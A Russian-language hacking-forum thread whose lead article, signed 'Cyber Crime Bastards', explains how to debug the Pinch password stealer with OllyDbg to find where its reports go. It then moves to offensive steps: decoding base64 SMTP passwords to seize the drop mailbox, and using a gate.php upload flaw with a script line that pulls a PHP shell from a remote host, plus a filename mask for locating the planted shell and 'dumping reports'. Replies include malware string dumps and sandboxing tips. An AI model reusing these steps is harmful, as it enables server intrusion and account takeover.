1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Cнимаем кэш с пинча, "куда идут отчёты?"

Тема в разделе "Статьи", создана пользователем stalin, 7 июл 2007.

  1. stalin
    stalin Новичок
    Симпатии:
    13
    +-<<------------------------------------+-----|-----+----------------------------------->>-+
    +-<<--------------------------|Cyber Crime Bastards|------------------------->>-+
    +-<<------------------------------------+-----|-----+----------------------------------->>-+

    Меня часто спрашивают "как узнать куда Pinch шлёт отчёт".
    Узнать можно снифером трафика, можно попробовать раскриптовать
    (распаковать) pinch и в hex редакторе глянуть куда шлёт отчёты, так же
    можно посмотреть в отладчике и сегодня мы узнаем как.

    Для этого нам понадобится непосредственно отладчик и виртуальная
    машина(virtual pc, vmware) либо просто машина с ОС. В роли отладчика
    будет Ollydbg, отлаживать будем пинч обыкновенный =)

    Ollydbg можно скачать здесь так же нам понадобится плагин к
    нему. В папку с Ollydbg кидаем плагин и приступаем к работе =)

    Открываем Ollydbg:



    Переходим в настройки (Options), лезем в дэбаг опции(Debugging
    options), переходим на вкладку Events и ставим галку на
    "Break on new thread" и жмём "ок":



    Теперь заходим в настройки (Options), там выбираем "Just-in-time
    debugging" и жмём на кнопку "Make OllyDmg just-in-time debugger"
    это нужно чтобы в диспетчере задач появилась дополнительная
    вкладка "Отладка" после чего жмём "Done":



    Далее открываем диспетчер задач(Ctrl+Alt+Del), открываем пинч,
    в диспетчере задач нажимаем правой кнопкой по нему и
    выбираем вкладку "Отладка":



    После этого мы увидим примерно следующее:



    Зайдём на вкладку "View" и выберем там "Executable modules", в
    открывшемся окне найдём наш пинч и нажмём 2 раза левой
    кнопкой мыши по нему:



    Далее в окне нажимаем правой кнопкой мыши и в контекстном
    меню во вкладке "Search for" выбираем "All referenced text strings":



    В открывшемся окне можно без труда посмотреть куда пинч
    отсылает отчёты:



    на скрине замечательно видно:
    www.uinov.com - хост
    /g/gate.php - путь до гейта
    uinov_@mail.ru - мыло куда идут отчёты

    В более новых версия пинча имя хоста зашифровано в двойной
    base64 и выглядит примерно так:



    где Y0dsdVkyZ3RhRzl6ZEM1eWRRPT0= означает pinch-host.ru,
    декодировать base64 можно на каком-либо сайте где есть онлайн
    кодирование\декодирование или через функцию base64_decode

    так же может быть что в пинче идёт отправка через smtp, там
    пароль на мэйл зашифрован в обычный base64:



    где cXdlcnR5 означает кодированный пароль qwerty, который
    подходит к mail1@mail.ru т.е. к мылу с которого идут отчёты. Зная
    пароль можно его сменить чтобы отчёты некогда не дошли до
    конечного адресата т.е. до mail2@mail.ru, или же попытаться сделать
    так что-бы все отправленные письма с mail1@mail.ru сохраняли
    свои копии на мэйле

    Зная путь до гейта можно заюзать сплоит который использует
    уязвимость в нём т.к. в гейте некорректная проверка расширения
    имени создаваемого файла и предсказуемое имя отчёта можно
    залить на хост обычный PHP шел. Для этого берём сплоит от
    KPbIC'а (скачать можно здесь), добавляем в него следующий PHP код:

    "$PHP=implode('', file('http://host.ru/shell.php'));"

    И прописываем в сплоит путь до гейта и папку с отчётами:

    "define("GATE_URL", "http://pinch-host.ru/gate/gate.php");"
    "define("REPS_DIR", "/ /reps /gate /rep /r reps rep r");"

    Льём на хост и запускаем сплоит, пример работы:



    Далее в папке отчётами создался php файл с шелом, проблема в том
    что нужно подобрать имя к этому файлу (по идеи сплоит сам должен
    вычислять имя файла но у меня не вычисляет хз почему), будем
    подбирать в ручную =) маска файла:
    "вре_мя-д.а.та_ip.ад.ре.с_.php"
    пример:
    "12_30-30.06.2007_127.0.0.1_.php"
    время и дата отображается в сплоите, а IP своего хоста мы и сами знаем
    после такой операции можно спокойно шататься по хосту, сливать отчёты,
    сплоиты и т.д.

    Статья рассчитана для новичков.

    +-<<------------------------------------+-----|-----+----------------------------------->>-+
    +-<<--------------------------|Cyber Crime Bastards|------------------------->>-+
    +-<<------------------------------------+-----|-----+----------------------------------->>-+

    автор: Stalin, за помощь в php спасибо z3e_NiFe
     
    7 июл 2007
    7 пользователям это понравилось.
  2. rijy
    rijy Админ
    Симпатии:
    174
    stalin, прекрасно!!..:baks:
     
    7 июл 2007
  3. key1ogger
    key1ogger Продвинутый
    Симпатии:
    4
    +1
    Можно еще узнать, куда идут отчеты, с помощью ArtMoney + Total Сommander + декодировщик base64 или сниффером ;)
     
    7 июл 2007
  4. Gex
    Gex Новичок
    Симпатии:
    0
    мне недавно кто-то троя прислал и я решил узнать кому оно надо и столкнулся вот с чем - незнаю где хеш пароля вообще он тут есть:
    Text strings referenced in SYSTRAY:
    Address Disassembly Text string
    00401000 PUSH EBP (Initial CPU selection)
    00401134 PUSH SYSTRAY.00406083 ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\"
    00401179 PUSH SYSTRAY.004060B8 ASCII "UninstallString"
    0040125F PUSH SYSTRAY.004060D0 ASCII "EHLO localhost"
    0040127D PUSH SYSTRAY.00406005 ASCII "MAIL FROM:Lamo@mail.ru"
    0040129B PUSH SYSTRAY.00406029 ASCII "RCPT TO: lebedinskay-60@mail.ru"
    004012B1 PUSH SYSTRAY.004060C9 ASCII "DATA"
    004012DB PUSH SYSTRAY.004060E7 ASCII "Subject: Passwords from ld-pinch (%s)"
    00401306 PUSH SYSTRAY.004060E1 ASCII "."
    00401393 PUSH SYSTRAY.00407BD4 ASCII "C:\WINDOWS\SYSTRAY.EXE"
    004013A0 PUSH SYSTRAY.00407BD4 ASCII "C:\WINDOWS\SYSTRAY.EXE"
    004013CE PUSH SYSTRAY.004013BB ASCII "M: %lu %lu"
    004013D3 PUSH SYSTRAY.00407BD4 ASCII "C:\WINDOWS\SYSTRAY.EXE"
    004013E0 PUSH SYSTRAY.00407BD4 ASCII "C:\WINDOWS\SYSTRAY.EXE"
    00401431 PUSH SYSTRAY.00406114 ASCII "X:\"
    0040146C PUSH SYSTRAY.00407BD4 ASCII "C:\WINDOWS\SYSTRAY.EXE"
    004014BA PUSH SYSTRAY.00406114 ASCII "X:\"
    004014DD PUSH SYSTRAY.0040148E ASCII "; %lu %lu %lu"
    004014E2 PUSH SYSTRAY.00407BD4 ASCII "C:\WINDOWS\SYSTRAY.EXE"
    004014EF PUSH SYSTRAY.00407BD4 ASCII "C:\WINDOWS\SYSTRAY.EXE"
    00401501 PUSH SYSTRAY.00406111 ASCII ""
    00401547 PUSH SYSTRAY.0040153A ASCII "U: %s"
    0040154C PUSH SYSTRAY.00407BD4 ASCII "C:\WINDOWS\SYSTRAY.EXE"
    00401559 PUSH SYSTRAY.00407BD4 ASCII "C:\WINDOWS\SYSTRAY.EXE"
    0040159C PUSH SYSTRAY.00401591 ASCII "CPV: %s"
    004015A1 PUSH SYSTRAY.00407BD4 ASCII "C:\WINDOWS\SYSTRAY.EXE"
    004015F9 PUSH SYSTRAY.004015CD ASCII "CPV: %s
    CPS: %lu
    CPM: %lu
    CPF: %lu
    .........
     
    10 авг 2007
  5. CRL
    CRL Guest
    Мне кажется, что нет... Ведь выглядеть он должен как нибудь через жопу например fh798fgfdtywqs23hkdjkh546cs9h93y3
     
    16 авг 2007
  6. script88
    script88 Новичок
    Симпатии:
    0
    А разве не легче определить куда конектиться сам пинч фаерволом, лично я на своем тестил пинче и фаервол показал куда хочет приконектиться )
     
    25 окт 2008
  7. onthar
    onthar Команда форума Админ
    Симпатии:
    388
    script88,
    и куда? на ип поп3 сервера, в случае если отчеты на мыло идут? кстати, это лучше делать на ВМке, закидывая туда уже зараженный файл, и выдирая из оперативки.
    Так же можно кинуть выдраный билд пинча на онлайн проверку сетевой активности - там тоже можно посмотреть удаленный ип.
     
    25 окт 2008
  8. script88
    script88 Новичок
    Симпатии:
    0
    А с русским интерфейсом есть такой hex редактор?
     
    25 окт 2008
  9. onthar
    onthar Команда форума Админ
    Симпатии:
    388
    script88,
    это не хекс-редактор. ха хекс редакторами в поиск, за руссификаторами в поиск.
    К тому же зачем там руссификация? там все и так понятно.
     
    25 окт 2008
  10. onthar
    onthar Команда форума Админ
    Симпатии:
    388
    VMware - виртуальная машина.

    И все таки вариант с файером - плохой вариант, зачем заражать свою машину лишний раз??
     
    25 окт 2008
  11. krytilla
    krytilla Новичок
    Симпатии:
    0
    Ссылка на плагин для Ollydbg битая=(
     
    9 мар 2012
  12. onthar
    onthar Команда форума Админ
    Симпатии:
    388
    все плагины прекрасно гуглятся.
     
    9 мар 2012

Поделиться этой страницей

Загрузка...